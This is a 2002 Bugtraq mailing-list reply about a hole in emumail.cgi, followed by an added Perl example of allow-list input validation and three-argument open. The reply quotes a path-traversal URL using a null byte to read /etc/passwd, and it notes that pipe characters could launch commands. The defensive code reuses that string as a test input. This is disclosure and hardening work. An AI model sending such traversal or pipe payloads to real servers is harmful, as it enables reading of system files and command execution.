[25011] in bugtraq
Re: emumail.cgi
daemon@ATHENA.MIT.EDU (Randal L. Schwartz)
Tue Apr 9 16:08:43 2002
To: "MegaHz" <admin@cyhackportal.com>
Cc: <bugtraq@securityfocus.com>, "N|ghtHawk" <nighthawk@hackers4hackers.nl>
From: merlyn@stonehenge.com (Randal L. Schwartz)
Date: 09 Apr 2002 12:14:17 -0700
In-Reply-To: <00e801c1dd68$11f2d9f0$0100a8c0@MEGAHZ>
Message-ID: <m1y9fwd6ra.fsf@halfdome.holdit.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
>>>>> "MegaHz" == MegaHz <admin@cyhackportal.com> writes:
MegaHz> u can also do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00
MegaHz> but u cannot do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

It's Perl, so I bet they didn't check for pipe symbols at the
beginning and ending either. That can launch things.

I wish people who write Perl code for the net would at *least* read
the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
company (like Stonehenge :) to vet the code.

--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
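
The checks discussed in this thread, as an added example that is not part of the original message and is not emumail's code: a CGI-style handler that validates a `type` value against an allow-list and opens the file with three-argument open, so a leading or trailing pipe, a NUL byte, or `../` never reaches the filesystem call. The directory, the `.html` suffix and the function names are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;

# Hypothetical template directory; not taken from emumail.
my $TEMPLATE_DIR = '/var/www/templates';

# Return the full path for a user-supplied template name,
# or nothing if the name is not acceptable.
sub safe_template_path {
    my ($name) = @_;
    return unless defined $name;

    # Allow-list instead of a block-list: letters, digits, '_' and '-' only.
    # \A and \z anchor the whole string (a bare '$' would accept a trailing
    # newline). This one test rejects '/', '..', NUL, '|', '<', '>' and spaces.
    return unless $name =~ /\A([A-Za-z0-9_-]{1,32})\z/;

    # The extension is appended by the program, never supplied by the client.
    return File::Spec->catfile($TEMPLATE_DIR, "$1.html");
}

# Open a validated template for reading.
sub open_template {
    my ($name) = @_;
    my $path = safe_template_path($name) or return;

    # Three-argument open: the mode is a separate, fixed argument, so no
    # character in $path is ever interpreted as a pipe or redirection.
    # Two-argument open (open(FH, $path)) does interpret them.
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed sample inputs: one normal name, the traversal value quoted in
# the thread (with its decoded NUL), and pipe characters at either end.
my @samples = ('inbox', "/../../../../../etc/passwd\0", '|example', 'example|');

for my $input (@samples) {
    # Show non-printable bytes as \xNN so the NUL is visible in the output.
    (my $shown = $input) =~ s/([^\x20-\x7e])/sprintf('\\x%02x', ord $1)/ge;
    my $verdict = defined safe_template_path($input) ? 'accepted' : 'rejected';
    printf "%-36s %s\n", "'$shown'", $verdict;
}
```

Only `inbox` is accepted; the other three constructed values are rejected by the name check before any `open` call is made.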